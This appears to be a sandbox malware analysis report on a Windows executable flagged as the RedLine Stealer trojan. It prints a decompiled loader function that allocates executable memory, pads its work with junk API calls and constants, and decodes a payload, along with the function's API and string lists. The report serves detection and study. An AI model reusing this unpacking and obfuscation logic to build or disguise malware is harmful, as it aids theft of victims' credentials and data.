File size:	297472 bytes
MD5 hash:	44F5530502DB25E5E66C15260EC4D25C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.515896038.00000000006EB000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 72%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: ikNC1JE7rY.exePID: 5644, Parent PID: 5984COMMON

Execution Graph

Execution Coverage:	7%
Dynamic/Decrypted Code Coverage:	1.5%
Signature Coverage:	6.5%
Total number of Nodes:	1758
Total number of Limit Nodes:	31

Executed Functions

Function 00405A6B Relevance: 81.0, APIs: 32, Strings: 14, Instructions: 514
memorycomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E00405A6B(void* __fp0) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t596;
				long _t600;
				void* _t603;
				struct HINSTANCE__* _t608;
				intOrPtr _t613;
				intOrPtr* _t623;
				intOrPtr* _t643;
				intOrPtr* _t645;
				intOrPtr* _t648;
				void* _t783;
				void* _t785;
				void* _t788;
				void* _t797;
				signed int _t799;
				long _t800;
				void* _t845;
				void* _t848;
				void* _t849;
				void* _t850;
				intOrPtr* _t855;
				void* _t857;
				intOrPtr* _t858;
				long _t869;
				void* _t871;
				void* _t883;

				_t883 = __fp0;
				_t858 = _t857 - 0x74;
				E00407168(E004176DE, _t855);
				E00406B10(0x1708);
				 *0x42e648 =  *0x41b80c; // executed
				_t596 = GlobalAlloc(0,  *0x42e644); // executed
				 *0x42dc24 = _t596;
				VirtualProtect(_t596,  *0x42e644, 0x40, _t855 + 0x70); // executed
				_t845 = 0;
				while(1) {
					GetLastError();
					if(_t845 < 0x129adee) {
						 *((intOrPtr*)(_t855 + 0x48)) = 0x16b700e0;
						 *((intOrPtr*)(_t855 - 0xa4)) = 0x729fb588;
						 *((intOrPtr*)(_t855 + 0x34)) = 0x77dc540a;
						 *((intOrPtr*)(_t855 + 0x68)) = 0x3cce353c;
						 *((intOrPtr*)(_t855 + 0x10)) = 0x7e9bacb0;
						 *((intOrPtr*)(_t855 - 0x9c)) = 0x1db2bd3d;
						 *((intOrPtr*)(_t855 - 0x84)) = 0x20627d21;
						 *((intOrPtr*)(_t855 - 0x1c)) = 0x3f6ac131;
						 *((intOrPtr*)(_t855 - 0x58)) = 0x4429947a;
						 *((intOrPtr*)(_t855 - 0x18)) = 0x5a1efe77;
						 *((intOrPtr*)(_t855 - 0x48)) = 0x4f98a507;
						 *((intOrPtr*)(_t855 - 0x10)) = 0x132dd8ea;
						 *((intOrPtr*)(_t855 - 0x68)) = 0x3c255f10;
						 *((intOrPtr*)(_t855 + 0x3c)) = 0x36416eaf;
						 *((intOrPtr*)(_t855 - 0x8c)) = 0xe14f715;
						 *((intOrPtr*)(_t855 - 0x6c)) = 0x7d5c34bd;
						 *((intOrPtr*)(_t855 + 0x44)) = 0x28df196a;
						 *((intOrPtr*)(_t855 + 0x18)) = 0x37dcb12c;
						 *((intOrPtr*)(_t855 - 0x3c)) = 0x72fc7d09;
						 *((intOrPtr*)(_t855 + 0x60)) = 0x5147c96c;
						 *(_t855 - 0x90) = 0x704b32f3;
						 *((intOrPtr*)(_t855 + 0x38)) = 0x5f8f1819;
						 *((intOrPtr*)(_t855 + 0x50)) = 0x27a76e55;
						 *((intOrPtr*)(_t855 - 0x40)) = 0x22fa090;
						 *((intOrPtr*)(_t855 - 0x38)) = 0x670e8118;
						 *((intOrPtr*)(_t855 + 4)) = 0xe01cd9b;
						 *((intOrPtr*)(_t855 - 0x30)) = 0x3c082c18;
						 *((intOrPtr*)(_t855 - 0xa8)) = 0x3ecf8779;
						 *(_t855 + 0x6c) = 0x3686b744;
						 *((intOrPtr*)(_t855 - 0x28)) = 0x38c96a6e;
						 *((intOrPtr*)(_t855 + 8)) = 0x1dd9dcf9;
						 *((intOrPtr*)(_t855 + 0xc)) = 0x3f99f2e3;
						 *((intOrPtr*)(_t855 - 0x98)) = 0x76152ab6;
						 *((intOrPtr*)(_t855 - 0x44)) = 0x35d35e74;
						 *((intOrPtr*)(_t855 - 0x74)) = 0x7f54c16b;
						 *((intOrPtr*)(_t855 + 0x14)) = 0x3ed4b651;
						 *((intOrPtr*)(_t855 + 0x28)) = 0x626e8506;
						 *((intOrPtr*)(_t855 - 0x2c)) = 0x5edd1c6f;
						 *((intOrPtr*)(_t855 - 0x5c)) = 0x7467e854;
						 *((intOrPtr*)(_t855 + 0x40)) = 0x678283b1;
						 *((intOrPtr*)(_t855 + 0x1c)) = 0x7774bd03;
						 *((intOrPtr*)(_t855 + 0x4c)) = 0x34eec2c0;
						 *((intOrPtr*)(_t855 + 0x58)) = 0x23ee5613;
						 *((intOrPtr*)(_t855 - 0xa0)) = 0x7710f6f;
						 *((intOrPtr*)(_t855 - 0x54)) = 0x4aa513f0;
						 *((intOrPtr*)(_t855 - 0x14)) = 0x14c03604;
						 *((intOrPtr*)(_t855 - 0x50)) = 0x709d39b2;
						 *((intOrPtr*)(_t855 - 0x88)) = 0x2d9fc390;
						 *((intOrPtr*)(_t855 - 0x4c)) = 0xdc26664;
						 *((intOrPtr*)(_t855 - 0x60)) = 0xef0aa3c;
						 *((intOrPtr*)(_t855 - 0x7c)) = 0x59d10e2f;
						 *((intOrPtr*)(_t855 - 0x80)) = 0xdb5b201;
						 *((intOrPtr*)(_t855 - 0x64)) = 0x3d00c619;
						 *((intOrPtr*)(_t855 - 0x34)) = 0x2ee3cb51;
						 *((intOrPtr*)(_t855 - 0x78)) = 0x5c1ad1e2;
						 *((intOrPtr*)(_t855 + 0x74)) = 0x6d5a82ad;
						 *((intOrPtr*)(_t855 + 0x24)) = 0x6415b55c;
						 *((intOrPtr*)(_t855 + 0x20)) = 0x43086827;
						 *((intOrPtr*)(_t855 + 0x54)) = 0x42d3b3fd;
						 *((intOrPtr*)(_t855 + 0x2c)) = 0x8ebf9f3;
						 *((intOrPtr*)(_t855 + 0x64)) = 0x3289be56;
						 *((intOrPtr*)(_t855 - 0x20)) = 0x198f9d06;
						 *((intOrPtr*)(_t855 - 0x24)) = 0x51e34c97;
						 *_t855 = 0x3238d997;
						 *((intOrPtr*)(_t855 + 0x5c)) = 0x2afa9fe6;
						 *((intOrPtr*)(_t855 + 0x30)) = 0x274f0a8c;
						 *((intOrPtr*)(_t855 - 0x70)) = 0x5900053b;
						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) - 0x4a11786;
						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) + 0x4560716b;
						 *((intOrPtr*)(_t855 + 0x34)) =  *((intOrPtr*)(_t855 + 0x34)) - 0x72fd1c75;
						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) - 0x2a2e8e8;
						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) - 0x1e649d84;
						 *((intOrPtr*)(_t855 + 0x34)) =  *((intOrPtr*)(_t855 + 0x34)) - 0x1adfd311;
						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) - 0x3f0a0b7;
						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) - 0x31fc1696;
						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) - 0x5e14f9c9;
						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) + 0xd42e0;
						 *((intOrPtr*)(_t855 + 0x10)) =  *((intOrPtr*)(_t855 + 0x10)) - 0x3c18d7b7;
						 *((intOrPtr*)(_t855 + 0x34)) =  *((intOrPtr*)(_t855 + 0x34)) - 0x2002a17a;
						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) + 0x66fa3a6b;
						 *((intOrPtr*)(_t855 - 0x9c)) =  *((intOrPtr*)(_t855 - 0x9c)) + 0x7644be02;
						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) - 0x38077f3b;
						 *((intOrPtr*)(_t855 - 0x84)) =  *((intOrPtr*)(_t855 - 0x84)) + 0x6861ed43;
						 *((intOrPtr*)(_t855 + 0x10)) =  *((intOrPtr*)(_t855 + 0x10)) + 0x2149ea17;
						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) - 0x42dd5e39;
						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) + 0x3fde49f0;
						 *((intOrPtr*)(_t855 + 0x34)) =  *((intOrPtr*)(_t855 + 0x34)) + 0x24c6ffa8;
						 *((intOrPtr*)(_t855 - 0x84)) =  *((intOrPtr*)(_t855 - 0x84)) + 0x1057b77;
						 *((intOrPtr*)(_t855 - 0x1c)) =  *((intOrPtr*)(_t855 - 0x1c)) - 0x49b1f22e;
						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) + 0x53f6c871;
						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) - 0x31e78741;
						 *((intOrPtr*)(_t855 - 0x9c)) =  *((intOrPtr*)(_t855 - 0x9c)) + 0x3718ba5b;
						 *((intOrPtr*)(_t855 + 0x10)) =  *((intOrPtr*)(_t855 + 0x10)) - 0x459675f0;
						 *((intOrPtr*)(_t855 - 0x18)) =  *((intOrPtr*)(_t855 - 0x18)) - 0x39fd0a2;
						 *((intOrPtr*)(_t855 - 0x48)) =  *((intOrPtr*)(_t855 - 0x48)) + 0x727a9530;
						 *((intOrPtr*)(_t855 - 0x48)) =  *((intOrPtr*)(_t855 - 0x48)) - 0x56301dce;
						 *((intOrPtr*)(_t855 - 0x1c)) =  *((intOrPtr*)(_t855 - 0x1c)) - 0x485ad839;
						 *((intOrPtr*)(_t855 - 0x10)) =  *((intOrPtr*)(_t855 - 0x10)) - 0x6f733afe;
						 *((intOrPtr*)(_t855 - 0x10)) =  *((intOrPtr*)(_t855 - 0x10)) - 0x1acbf0c0;
						 *((intOrPtr*)(_t855 - 0x10)) =  *((intOrPtr*)(_t855 - 0x10)) + 0x6bbfcb99;
						 *((intOrPtr*)(_t855 - 0x8c)) =  *((intOrPtr*)(_t855 - 0x8c)) + 0x6a615b6a;
						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) + 0x403e4fb5;
						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) - 0x5ec62208;
						 *((intOrPtr*)(_t855 - 0x68)) =  *((intOrPtr*)(_t855 - 0x68)) + 0x39bcf23a;
						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) - 0x746a7ea9;
						 *((intOrPtr*)(_t855 - 0x68)) =  *((intOrPtr*)(_t855 - 0x68)) + 0x1b651608;
						 *((intOrPtr*)(_t855 + 0x3c)) =  *((intOrPtr*)(_t855 + 0x3c)) + 0x524f99ee;
						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) - 0x76b5296;
						 *((intOrPtr*)(_t855 - 0x9c)) =  *((intOrPtr*)(_t855 - 0x9c)) - 0x1ca732cc;
						 *((intOrPtr*)(_t855 - 0x1c)) =  *((intOrPtr*)(_t855 - 0x1c)) + 0x4a0bd545;
						 *((intOrPtr*)(_t855 + 0x18)) =  *((intOrPtr*)(_t855 + 0x18)) - 0x249dac94;
						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) - 0x6fb1faa3;
						 *((intOrPtr*)(_t855 + 0x50)) =  *((intOrPtr*)(_t855 + 0x50)) - 0x50ecbeb8;
						 *(_t855 - 0x90) =  *(_t855 - 0x90) + 0x4d7e5689;
						 *((intOrPtr*)(_t855 - 0x68)) =  *((intOrPtr*)(_t855 - 0x68)) + 0x591a883a;
						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) + 0x78fc8c1e;
						 *((intOrPtr*)(_t855 - 0x8c)) =  *((intOrPtr*)(_t855 - 0x8c)) - 0x3ecbf404;
						 *((intOrPtr*)(_t855 + 4)) =  *((intOrPtr*)(_t855 + 4)) - 0x6fe1682;
						 *((intOrPtr*)(_t855 - 0x1c)) =  *((intOrPtr*)(_t855 - 0x1c)) + 0x9e116c0;
						 *((intOrPtr*)(_t855 + 0x34)) =  *((intOrPtr*)(_t855 + 0x34)) + 0x42f97163;
						 *((intOrPtr*)(_t855 + 0x3c)) =  *((intOrPtr*)(_t855 + 0x3c)) - 0x7593f15b;
						 *((intOrPtr*)(_t855 - 0x84)) =  *((intOrPtr*)(_t855 - 0x84)) + 0x7eef95db;
						 *((intOrPtr*)(_t855 + 0x50)) =  *((intOrPtr*)(_t855 + 0x50)) + 0x6c82abb3;
						 *((intOrPtr*)(_t855 + 0x50)) =  *((intOrPtr*)(_t855 + 0x50)) - 0x6508f030;
						 *((intOrPtr*)(_t855 - 0x98)) =  *((intOrPtr*)(_t855 - 0x98)) - 0x1c707926;
						 *((intOrPtr*)(_t855 + 0x10)) =  *((intOrPtr*)(_t855 + 0x10)) - 0x21ba796a;
						 *((intOrPtr*)(_t855 + 0x44)) =  *((intOrPtr*)(_t855 + 0x44)) - 0x495bf23b;
						 *((intOrPtr*)(_t855 + 0x18)) =  *((intOrPtr*)(_t855 + 0x18)) + 0x4af4edd1;
						 *((intOrPtr*)(_t855 + 0x3c)) =  *((intOrPtr*)(_t855 + 0x3c)) + 0x5367e117;
						 *((intOrPtr*)(_t855 - 0x98)) =  *((intOrPtr*)(_t855 - 0x98)) + 0x300e1081;
						 *((intOrPtr*)(_t855 + 8)) =  *((intOrPtr*)(_t855 + 8)) + 0x32361f60;
						 *((intOrPtr*)(_t855 - 0x44)) =  *((intOrPtr*)(_t855 - 0x44)) - 0x70fde692;
						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) - 0x103a5e93;
						 *((intOrPtr*)(_t855 - 0x5c)) =  *((intOrPtr*)(_t855 - 0x5c)) + 0x529fcf39;
						 *((intOrPtr*)(_t855 + 0x38)) =  *((intOrPtr*)(_t855 + 0x38)) + 0x7c9f7835;
						 *((intOrPtr*)(_t855 + 0x14)) =  *((intOrPtr*)(_t855 + 0x14)) - 0x708c25b4;
						 *(_t855 - 0x90) =  *(_t855 - 0x90) + 0x36d67e57;
						 *((intOrPtr*)(_t855 + 0xc)) =  *((intOrPtr*)(_t855 + 0xc)) - 0x57fb3c02;
						 *((intOrPtr*)(_t855 + 0x40)) =  *((intOrPtr*)(_t855 + 0x40)) - 0x3f99fb2a;
						 *((intOrPtr*)(_t855 - 0x1c)) =  *((intOrPtr*)(_t855 - 0x1c)) - 0x74f97a90;
						 *((intOrPtr*)(_t855 - 0x38)) =  *((intOrPtr*)(_t855 - 0x38)) - 0x17ce5752;
						 *((intOrPtr*)(_t855 - 0x4c)) =  *((intOrPtr*)(_t855 - 0x4c)) - 0x4821aa3d;
						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) + 0x3a3f3a40;
						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) - 0x1de8200;
						 *((intOrPtr*)(_t855 - 0x8c)) =  *((intOrPtr*)(_t855 - 0x8c)) + 0x6c325c08;
						 *((intOrPtr*)(_t855 - 0x34)) =  *((intOrPtr*)(_t855 - 0x34)) + 0x60a345da;
						 *((intOrPtr*)(_t855 - 0x5c)) =  *((intOrPtr*)(_t855 - 0x5c)) - 0xc11cad6;
						 *((intOrPtr*)(_t855 - 0x88)) =  *((intOrPtr*)(_t855 - 0x88)) - 0x24391f5c;
						 *((intOrPtr*)(_t855 + 0x44)) =  *((intOrPtr*)(_t855 + 0x44)) - 0x7643ad89;
						 *((intOrPtr*)(_t855 - 0x9c)) =  *((intOrPtr*)(_t855 - 0x9c)) - 0x21db0587;
						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) + 0x6c6ae23;
						 *((intOrPtr*)(_t855 - 0x80)) =  *((intOrPtr*)(_t855 - 0x80)) - 0x17d6899a;
						 *((intOrPtr*)(_t855 - 0x34)) =  *((intOrPtr*)(_t855 - 0x34)) + 0x4749c337;
						 *((intOrPtr*)(_t855 - 0x4c)) =  *((intOrPtr*)(_t855 - 0x4c)) + 0x4dd6c6ef;
						 *((intOrPtr*)(_t855 + 0x14)) =  *((intOrPtr*)(_t855 + 0x14)) + 0x402e7a02;
						 *((intOrPtr*)(_t855 - 0x10)) =  *((intOrPtr*)(_t855 - 0x10)) + 0x4d6aa82;
						_t799 = 0x74d17c3e *  *(_t855 + 0x6c) >> 0x20;
						__imp__GetProcessHandleCount(0, 0); // executed
					}
					GetSystemDefaultLCID();
					if(_t845 > 0x12a82b5) {
						break;
					}
					_t845 = _t845 + 1;
					if(_t845 < 0x17c462e4) {
						continue;
					}
					break;
				}
				_t865 =  *0x42e644 - 0x16;
				if( *0x42e644 == 0x16) {
					GetVersionExW(0);
					GetComputerNameA(_t855 - 0x4c4, _t855 - 0x90);
					GlobalWire(_t855 - 0xf14);
					ResetEvent(0);
					OpenWaitableTimerA(0, 0, "padumojerupodivufojonabahusemufikeserivifaleb");
					FindNextFileW(0, _t855 - 0x714);
					 *((intOrPtr*)(_t855 - 0xac)) = 0xf;
					E004058A2(_t855 - 0xc4, 0);
					 *(_t855 - 4) = 0;
					E0040753F(_t783, 0, "0.txt", "rb");
					E00407447(0);
					_pop(_t797);
					_t643 = _t858;
					 *_t643 = 0;
					 *((intOrPtr*)(_t643 + 4)) = 0;
					E0040556F(_t883);
					st0 = _t883;
					_t645 = _t858;
					 *_t645 = 0;
					 *((intOrPtr*)(_t645 + 4)) = 0;
					E0040554C(_t883, _t797, _t797);
					st0 = _t883;
					E004072E8(_t783, _t799, 1, 0, _t865);
					_t648 = _t858;
					 *_t648 = 0;
					 *((intOrPtr*)(_t648 + 4)) = 0;
					E00405529(_t883, _t797, 0);
					st0 = _t883;
					 *(_t855 - 4) =  *(_t855 - 4) | 0xffffffff;
					E004058C7(_t855 - 0xc4, 1, _t855, 1, 0);
				}
				_t867 =  *0x42e644 - 0xc;
				if( *0x42e644 == 0xc) {
					__imp__OleQueryCreateFromData();
					__imp__WinHttpCloseHandle();
					FoldStringW(0, L"miputuwudukabocayuvehom", 0, _t855 - 0xf14, 0);
					E00407447(0);
					E004072A3(0, 0);
					_t623 = _t858;
					 *_t623 = 0;
					 *((intOrPtr*)(_t623 + 4)) = 0;
					E00405529(_t883, 0, 0);
					st0 = _t883;
					_push(0);
					_push(0);
					E00407187(_t783, _t799, 1, 0, _t867);
					E004059C4(_t855 - 0xc0);
					 *(_t855 - 4) = 1;
					E00405931(_t855 - 0x94,  *((intOrPtr*)(_t855 - 0xb4)), _t855 - 0xc0);
					 *(_t855 - 4) =  *(_t855 - 4) | 0xffffffff;
					E00405A3C(_t855 - 0xc0);
				}
				_t848 = 0;
				_t869 =  *0x42e644; // 0xf790
				if(_t869 > 0) {
					do {
						_t613 =  *0x42e648; // 0x36a035
						 *((intOrPtr*)(_t855 + 0x74)) = _t613;
						 *((intOrPtr*)(_t855 + 0x74)) =  *((intOrPtr*)(_t855 + 0x74)) + 0xb2d3b;
						_t788 =  *0x42dc24; // 0x62f9dc
						 *((char*)(_t848 + _t788)) =  *((intOrPtr*)( *((intOrPtr*)(_t855 + 0x74)) + _t848));
						if( *0x42e644 == 0x44) {
							__imp__GetLongPathNameA(0, _t855 - 0x4c4, 0);
							CreateMutexA(0, 0, 0);
						}
						_t848 = _t848 + 1;
						_t871 = _t848 -  *0x42e644; // 0xf790
					} while (_t871 < 0);
				}
				_t849 = 0;
				do {
					_t600 =  *0x42e644; // 0xf790
					if(_t600 + _t849 == 0x5e) {
						SetConsoleCtrlHandler(0, 0);
						AddAtomW(L"Nalid cinunec");
						lstrcpynA(_t855 - 0x4c4, 0, 0);
						__imp__SetFileShortNameW(0, L"bawum");
					}
					_t849 = _t849 + 1;
				} while (_t849 < 0x40c893);
				_t800 =  *0x42e644; // 0xf790
				_t785 =  *0x42dc24; // 0x62f9dc
				E0040573C(_t785, _t800, 0x419008);
				_t603 = 0;
				do {
					if(_t603 == 0x770e) {
						 *((intOrPtr*)(_t855 + 0x74)) = 0;
						 *((intOrPtr*)(_t855 + 0x74)) =  *((intOrPtr*)(_t855 + 0x74)) + 0x3afc;
						 *0x42dc24 =  *0x42dc24 +  *((intOrPtr*)(_t855 + 0x74));
					}
					_t603 = _t603 + 1;
				} while (_t603 < 0x286b97d);
				_t850 = 0x7b;
				do {
					if( *0x42e644 == 0xd) {
						GetFileType(0);
						FindFirstChangeNotificationW(0, 0, 0);
					}
					if( *0x42e644 == 0xf) {
						__imp__GetConsoleAliasW(0, _t855 - 0x1714, 0, 0);
						GetUserDefaultLangID();
					}
					_t850 = _t850 - 1;
				} while (_t850 != 0);
				_t608 = LoadLibraryA("msimg32.dll"); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t855 - 0xc));
				return _t608;
			}

0x00405a6b
0x00405a6c
0x00405a74
0x00405a7e
0x00405a93
0x00405a98
0x00405aaa
0x00405ab0
0x00405ab6
0x00405ab8
0x00405ab8
0x00405ac4
0x00405aca
0x00405ad1
0x00405adb
0x00405ae2
0x00405ae9
0x00405af0
0x00405afa
0x00405b04
0x00405b0b
0x00405b12
0x00405b19
0x00405b20
0x00405b27
0x00405b2e
0x00405b35
0x00405b3f
0x00405b46
0x00405b4d
0x00405b54
0x00405b5b
0x00405b62
0x00405b6c
0x00405b73
0x00405b7a
0x00405b81
0x00405b88
0x00405b8f
0x00405b96
0x00405ba0
0x00405ba7
0x00405bae
0x00405bb5
0x00405bbc
0x00405bc6
0x00405bcd
0x00405bd4
0x00405bdb
0x00405be2
0x00405be9
0x00405bf0
0x00405bf7
0x00405bfe
0x00405c05
0x00405c0c
0x00405c16
0x00405c1d
0x00405c24
0x00405c2b
0x00405c35
0x00405c3c
0x00405c43
0x00405c4a
0x00405c51
0x00405c58
0x00405c5f
0x00405c66
0x00405c6d
0x00405c74
0x00405c7b
0x00405c82
0x00405c89
0x00405c90
0x00405c97
0x00405c9e
0x00405ca5
0x00405cac
0x00405cb3
0x00405cba
0x00405cc1
0x00405cde
0x00405cf0
0x00405cf7
0x00405d09
0x00405d21
0x00405d2b
0x00405d35
0x00405d3f
0x00405d62
0x00405d69
0x00405d7b
0x00405d85
0x00405d8f
0x00405db2
0x00405dbc
0x00405dc3
0x00405dd5
0x00405ddc
0x00405dee
0x00405df8
0x00405dff
0x00405e06
0x00405e34
0x00405e3e
0x00405e56
0x00405e5d
0x00405e7a
0x00405e81
0x00405e93
0x00405e9a
0x00405ea1
0x00405eb3
0x00405ebd
0x00405eeb
0x00405ef5
0x00405efc
0x00405f06
0x00405f0d
0x00405f14
0x00405f26
0x00405f30
0x00405f48
0x00405f4f
0x00405f56
0x00405f5d
0x00405f67
0x00405f6e
0x00405f78
0x00405f82
0x00405f89
0x00405f90
0x00405f97
0x00405f9e
0x00405fa8
0x00405faf
0x00405fb6
0x00405fd6
0x00405fdd
0x00405fe4
0x00405feb
0x00405ff2
0x00405ffc
0x00406003
0x0040600a
0x00406027
0x0040602e
0x00406040
0x00406047
0x00406051
0x00406058
0x00406075
0x0040607c
0x0040608e
0x00406095
0x0040609c
0x004060a6
0x004060b0
0x004060b7
0x004060c9
0x004060d3
0x004060da
0x004060fa
0x00406104
0x00406132
0x00406139
0x00406140
0x00406152
0x0040617f
0x00406187
0x00406187
0x0040618d
0x00406199
0x00000000
0x00000000
0x0040619b
0x004061a2
0x00000000
0x00000000
0x00000000
0x004061a2
0x004061ab
0x004061b2
0x004061b9
0x004061cd
0x004061da
0x004061e1
0x004061ee
0x004061fc
0x00406209
0x00406213
0x00406223
0x00406226
0x0040622c
0x00406232
0x00406233
0x00406235
0x00406237
0x0040623a
0x0040623f
0x00406243
0x00406245
0x00406247
0x0040624a
0x0040624f
0x00406252
0x00406258
0x0040625a
0x0040625c
0x0040625f
0x00406264
0x00406266
0x00406272
0x00406272
0x00406277
0x0040627e
0x00406281
0x00406288
0x0040629d
0x004062a4
0x004062ab
0x004062b1
0x004062b3
0x004062b5
0x004062b8
0x004062bd
0x004062bf
0x004062c0
0x004062c1
0x004062ce
0x004062e6
0x004062e9
0x004062ee
0x004062f8
0x004062f8
0x004062fd
0x004062ff
0x00406305
0x00406307
0x00406307
0x0040630c
0x00406314
0x0040631d
0x00406323
0x0040632d
0x00406338
0x00406341
0x00406341
0x00406347
0x00406348
0x00406348
0x00406307
0x00406350
0x00406352
0x00406352
0x0040635c
0x00406360
0x0040636b
0x0040637a
0x00406386
0x00406386
0x0040638c
0x0040638d
0x00406395
0x0040639b
0x004063a6
0x004063ab
0x004063ad
0x004063b2
0x004063b4
0x004063b7
0x004063c1
0x004063c1
0x004063c7
0x004063c8
0x004063d1
0x004063d2
0x004063d9
0x004063dc
0x004063e5
0x004063e5
0x004063f2
0x004063fe
0x00406404
0x00406404
0x0040640a
0x0040640a
0x00406412
0x0040641c
0x00406428

APIs

__EH_prolog.LIBCMT ref: 00405A74
GlobalAlloc.KERNELBASE(00000000), ref: 00405A98
VirtualProtect.KERNELBASE(00000000,00000040,?), ref: 00405AB0
GetLastError.KERNEL32 ref: 00405AB8
GetProcessHandleCount.KERNELBASE(00000000,00000000,3686B744,274F0A8C,4AF4EDD1,4DD6C6EF,3A3F3A40,708C25B4,59D10E2F,36D67E57,3289BE56,4821AA3D,3A3F3A40,626E8506,626E8506,42D3B3FD), ref: 00406187

Part of subcall function 00405A3C: __EH_prolog.LIBCMT ref: 00405A41

GetSystemDefaultLCID.KERNEL32 ref: 0040618D
GetVersionExW.KERNEL32(00000000), ref: 004061B9
GetComputerNameA.KERNEL32(?,?), ref: 004061CD
GlobalWire.KERNEL32 ref: 004061DA
ResetEvent.KERNEL32(00000000), ref: 004061E1
OpenWaitableTimerA.KERNEL32(00000000,00000000,padumojerupodivufojonabahusemufikeserivifaleb), ref: 004061EE
FindNextFileW.KERNEL32(00000000,?), ref: 004061FC
__wfopen_s.LIBCMT ref: 00406226
_feof.LIBCMT ref: 0040622C
_puts.LIBCMT ref: 00406252
OleQueryCreateFromData.OLE32(00000000), ref: 00406281
WinHttpCloseHandle.WINHTTP(00000000), ref: 00406288
FoldStringW.KERNEL32(00000000,miputuwudukabocayuvehom,00000000,?,00000000), ref: 0040629D
_feof.LIBCMT ref: 004062A4
_fsetpos.LIBCMT ref: 004062AB
_fprintf.LIBCMT ref: 004062C1
GetLongPathNameA.KERNEL32 ref: 00406338
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00406341
SetConsoleCtrlHandler.KERNEL32(00000000,00000000), ref: 00406360
AddAtomW.KERNEL32(Nalid cinunec), ref: 0040636B
lstrcpynA.KERNEL32(?,00000000,00000000), ref: 0040637A
SetFileShortNameW.KERNEL32(00000000,bawum), ref: 00406386
GetFileType.KERNEL32(00000000), ref: 004063DC
FindFirstChangeNotificationW.KERNEL32(00000000,00000000,00000000), ref: 004063E5
GetConsoleAliasW.KERNEL32(00000000,?,00000000,00000000), ref: 004063FE
GetUserDefaultLangID.KERNEL32 ref: 00406404
LoadLibraryA.KERNELBASE(msimg32.dll), ref: 00406412

Strings

Tgt, xrefs: 00405BE9
/,cZ, xrefs: 00405FC0
@:?:, xrefs: 00406095
Nalid cinunec, xrefs: 00406366
Cah, xrefs: 00405DB2
kq`E, xrefs: 00405CC1
msimg32.dll, xrefs: 0040640D
j[aj, xrefs: 00405EB3
&v1>, xrefs: 00405D57
padumojerupodivufojonabahusemufikeserivifaleb, xrefs: 004061E7
miputuwudukabocayuvehom, xrefs: 00406297
lJ, xrefs: 00405E6F
0.txt, xrefs: 0040621D
bawum, xrefs: 00406380

Memory Dump Source

Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: FileName$ConsoleCreateDefaultFindGlobalH_prologHandle_feof$AliasAllocAtomChangeCloseComputerCountCtrlDataErrorEventFirstFoldFromHandlerHttpLangLastLibraryLoadLongMutexNextNotificationOpenPathProcessProtectQueryResetShortStringSystemTimerTypeUserVersionVirtualWaitableWire__wfopen_s_fprintf_fsetpos_putslstrcpyn
String ID: lJ$&v1>$/,cZ$0.txt$@:?:$Cah$Nalid cinunec$Tgt$bawum$j[aj$kq`E$miputuwudukabocayuvehom$msimg32.dll$padumojerupodivufojonabahusemufikeserivifaleb
API String ID: 1493176409-4139528676
Opcode ID: 6da46279e15f9b1820cb361b9289847db53e4abe8cb06125514456919f854b0b
Instruction ID: bb73222b721ae5790bf0f43ae7b398a59fbe0ad7c8ad8c6f35e93601ff7b34d9
